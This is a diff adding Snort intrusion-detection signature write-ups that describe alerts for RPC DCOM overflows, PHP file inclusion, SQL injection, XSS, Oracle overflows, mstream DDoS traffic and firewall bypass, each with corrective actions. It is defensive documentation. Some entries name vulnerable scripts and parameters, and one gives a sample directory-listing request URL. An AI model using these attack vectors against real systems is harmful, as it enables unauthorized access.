+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3439.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3439
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000317.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+100000317
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "phpBazar" application running on a webserver. 
+Access to the file "classified_right.php" using a remote file being passed as 
+the "language_dir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "language_dir" parameter in the "classified_right.php" 
+script used by the "phpBazar" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBazar
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3168.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3168
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000459.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000459
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "WeBBoA" application running on a webserver. Access to the 
+file "yeni_host.asp" with SQL commands being passed as the "id" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "yeni_host.asp" script used by the 
+"WeBBoA" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WeBBoA
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1099.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1099
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3327.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3327
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2638.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2638
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
--- /dev/null
+++ b/doc/signatures/913.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+913
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000450.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000450
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VanillaSoft Helpdesk" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "username" parameter in the "default.asp" 
+script used by the "VanillaSoft Helpdesk" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VanillaSoft Helpdesk
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/3243.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3243
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/503.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+503
+
+--
+Summary:
+This event is generated when possible non-legitimate traffic is detected
+that should not be allowed through a firewall.
+
+--
+Impact:
+This can be used to pass through a poorly configured firewall.
+
+--
+Detailed Information:
+Traffic from port 20 is normally FTP traffic.  Commands are passed to an
+FTP server over port 21.  In order to download files, a client tells the
+FTP server to connect to the client on port 'X' where 'X' is a port 
+above 1023.  The FTP server then connects to the client on the given 
+port using the source port of 20.  Ports below 1024 are privileged, a 
+legitimate connection from an ftp server should always be to a port 
+above 1023.  Some misconfigured firewalls may blindly allow connections 
+to any port from a source port of 20.
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+An attacker could use a source port of 20 for TCP connections to bypass 
+a poorly configured firewall.  
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Connections from port 20 should only be allowed to ports >=1024.  A 
+better solution would be block this traffic entirely and force FTP 
+clients inside the firewall to use PASV mode.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS06
+
+--
--- /dev/null
+++ b/doc/signatures/111-5.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+111-5
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event indicates that the pre-processor stream4 has detected a
+packet with only the SYN flag set that contains a payload. A packet with
+this flag set is meant to only set up a session between a client and
+server. Any data in a packet of this kind indicates malicious activity
+is taking place.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can attempt to evade an IDS by sending a malicious payload
+in a packet designed to set up a session.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1189.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1189
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-stop-ver".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
--- /dev/null
+++ b/doc/signatures/246.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+246
+
+--
+Summary:
+This event is generated when an mstream agent responds to an mstream handler's "ping" request.
+
+--
+Impact:
+Severe.  If the listed source IP is in your network, it may be an mstream agent.  If the listed destination IP is in your network, it may be an mstream agent.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler can probe to see if an agent is active by sending it a UDP packet to destination port 10498 with a string of "ping" in the payload.  An active agent will reply with a UDP packet to destination port 6838 with a string of "pong" in payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+A mstream agent may respond with a "pong" to a "ping" request from a handler. 
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known agent-to-handler ports in addition to 6838.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+NAI:
+http://vil.nai.com/vil/content/v_98662.htm
+SecurityFocus:
+http://www.securityfocus.com/archive/82/58040
+CERT:
+http://www.cert.org/incident_notes/IN-2000-05.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
--- /dev/null
+++ b/doc/signatures/100000379.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000379
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_mass_email.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_mass_email.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/797.txt
@@ -0,0 +1,62 @@
+
+Rule:  
+
+--
+Sid:
+797
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a picture - e.g. niceboy.jpg.vbs gets displayed as
+nicegboy.jpg but is a visual basic script and not a picture.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
--- /dev/null
+++ b/doc/signatures/100000794.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000794
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "line2" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/544.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+544
+
+--
+Summary:
+This event is generated when an attempt is made to retrieve a file named
+"1mb" from an ftp server.
+
+--
+Impact:
+Possible abuse ftp behavior by hordes of warez sites, and the
+existance of (potentially) illegal files/software on an ftp server.
+
+--
+Detailed Information:
+Warez sites have been known to name "warez" files by their size.  Large
+files are split into smaller, more manageable chunks, and allow warez
+sites to store large files on ftp sites in a semi-organized manner.
+Once these files are uploaded, it is common practice for other warez
+users to attempt to retrieve them.
+
+--
+Affected Systems:
+ All FTP servers
+
+--
+Attack Scenarios:
+As part of an attempt to store elite warez on an ftp server, an
+attacker named the file "1mb" to indicate it's size.  This file is
+likely part of an archive that represents a larger, most likely
+illegal copy of media.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required
+
+--
+False Positives:
+If a legitimate user has a legitimate file named "1mb", this rule may
+generate an event.
+
+--
+False Negatives:
+This will detect only files named 1mb.  If a warez site decides to
+start naming their files in a different way this rule will not generate
+an event.
+
+--
+Corrective Action:
+Inspect the ftp server for a file named 1mb. If it exists, determine
+if the file is legitimate, or if it was deposited by someone attempting
+to use the server to distribute non-legitimate files.
+
+Furthermore, evaluate the need for ftp write access.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2744.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2744
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2984.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2176
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
